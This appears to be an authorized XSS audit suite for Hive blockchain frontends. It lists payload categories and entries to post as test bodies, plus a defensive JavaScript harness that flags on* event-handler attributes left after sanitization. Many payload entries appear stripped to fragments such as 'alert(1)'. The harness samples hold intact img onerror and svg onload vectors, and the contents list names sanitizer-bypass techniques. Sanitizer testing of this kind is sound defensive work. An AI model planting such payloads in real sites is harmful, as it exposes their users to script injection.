XSS Payload Test Suite for Hive Frontends
⚠️ FOR AUTHORIZED TESTING ONLY
Do not use against systems without explicit written permission.
Report ID: AUDIT-20260322
Auditor: louis88
Purpose: Post each payload as a Hive blockchain post body to test sanitization
across condenser and other Hive frontends. All payloads use alert(1) or
alert(document.domain) as a benign proof-of-concept indicator.
How to use: Each section contains payloads wrapped in markdown code fences
for reference, followed by the raw payload to copy. Test each payload as:
- A standalone post body
- Wrapped in <html>...</html> tags (triggers the raw HTML path in MarkdownViewer)
- Inside a markdown paragraph mixed with normal text
- As a comment on an existing post
Table of Contents
- Standard Vectors
- HTML Tag Event Handlers — Exhaustive
- SVG Vectors
- MathML Vectors
- HTML5 Semantic & Obscure Tags
- Encoding Bypass Vectors
- Unicode & Character Tricks
- CSS-Based Vectors
- Markdown-Specific Vectors
- Mutation XSS (mXSS)
- DOM Clobbering Chains
- Template & Framework-Specific
- Protocol Handler Abuse
- Meta & Base Tag Injection
- Form & Input Hijacking
- Object, Embed & Applet
- Media Elements
- Focus & Autofocus Chains
- Animation & Transition Events
- Content-Editable & Designmode
- Polyglot Payloads
- DOMPurify Specific Bypasses
- Condenser html-Wrapper Path
- Dangling Markup Injection
- Tab-Nabbing & Window Reference
- Exotic Attribute Vectors
- Regex Sanitizer Bypass Techniques
- Obfuscation & Evasion Techniques
- Payload Chaining & Multi-Stage
1. Standard Vectors
Classic payloads that every sanitizer should catch. If any of these fire, the sanitizer is fundamentally broken.
XSS-STD-001
alert(1)
XSS-STD-002
XSS-STD-003
alert(String.fromCharCode(72,105))
XSS-STD-004
alert(1)
XSS-STD-005
alert(1)
XSS-STD-006 — Script with CDATA (XHTML context)
/**/
XSS-STD-007 — Closing existing tag context
alert(1)
XSS-STD-008 — Closing textarea context
alert(1)
XSS-STD-009 — Closing noscript context
alert(1)
XSS-STD-010 — Line breaks in tag
alert(1)</scr
ipt>
2. HTML Tag Event Handlers — Exhaustive
Comprehensive list of every HTML event handler attribute. Many sanitizers only block onerror and onload but miss obscure handlers.
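As an added example (not code from this audit, from condenser or from DOMPurify), the defensive counterpart of that observation: a test-harness helper that tokenizes sanitizer output and reports any attribute whose name starts with `on`, run here against a deliberately weak two-name blocklist sanitizer over constructed sample bodies. The function names, the blocklist sanitizer and the sample corpus are assumptions of this example.

```javascript
// Added example (not from this audit, condenser or DOMPurify): flag ANY
// attribute named on* in sanitizer output instead of matching a blocklist.
// The tokenizer follows the HTML attribute grammar closely enough to see
// through the newline, tab and slash separators this suite exercises.

// Lower-cased names of every attribute in every start tag of `html`.
function attributeNames(html) {
  const names = [];
  // "<name" then attributes; quoted values may legitimately contain ">".
  const tagRe = /<[a-zA-Z][^\s/>]*((?:"[^"]*"|'[^']*'|[^'">])*)>/g;
  // Separators, a name, then an optional "= value" (quoted or bare).
  const attrRe = /[\s/]*([^\s/=>]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]*))?/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    attrRe.lastIndex = 0;
    let attr;
    while ((attr = attrRe.exec(tag[1])) !== null) names.push(attr[1].toLowerCase());
  }
  return names;
}

// Event-handler attributes that survived sanitization: anything named on*.
function leakedHandlers(html) {
  return attributeNames(html).filter((n) => n.startsWith('on'));
}

// The weak strategy warned about above: a regex that strips only two names.
function blocklistSanitize(html) {
  return html.replace(/\s(?:onerror|onload)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]*)/gi, '');
}

// Run a sanitizer over a corpus; return { id: [leaked handler names] }.
function audit(sanitize, corpus) {
  const report = {};
  for (const [id, body] of Object.entries(corpus)) {
    const leaked = leakedHandlers(sanitize(body));
    if (leaked.length > 0) report[id] = leaked;
  }
  return report;
}

// Constructed sample bodies, modelled on the suite's benign alert(1) probes.
const SAMPLES = {
  'EVT-onerror': '<img src=x onerror=alert(1)>',
  'EVT-hover': '<div onmouseover=alert(1)>HOVER ME</div>',
  'EVT-newline': '<img\nsrc=x\nONERROR=alert(1)>',
  'EVT-slash': '<svg/onload=alert(1)>',
  clean: '<a href="https://example.com" title="a > b">link</a>',
};
console.log(audit(blocklistSanitize, SAMPLES)); // { 'EVT-hover': [ 'onmouseover' ], 'EVT-slash': [ 'onload' ] }
```

Plug a real sanitizer (for example DOMPurify's `sanitize`) into `audit` in place of `blocklistSanitize`; any non-empty report is a failing case for that section's payloads.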
2.1 Mouse Events
XSS-EVT-001
![]()
XSS-EVT-002
HOVER ME
XSS-EVT-003
HOVER ME
XSS-EVT-004
HOVER THEN LEAVE
XSS-EVT-005
CLICK ME
XSS-EVT-006
CLICK ME
XSS-EVT-007
MOVE OVER ME
XSS-EVT-008
LEAVE ME
XSS-EVT-009
CLICK ME
XSS-EVT-010
DOUBLE CLICK
XSS-EVT-011
RIGHT CLICK ME
XSS-EVT-012
SCROLL ON ME
2.2 Keyboard Events
XSS-EVT-013
XSS-EVT-014
XSS-EVT-015
2.3 Load / Lifecycle Events
XSS-EVT-016
XSS-EVT-017
![]()
XSS-EVT-018
XSS-EVT-019
XSS-EVT-020
XSS-EVT-021
XSS-EVT-022
XSS-EVT-023
![]()
XSS-EVT-024
XSS-EVT-025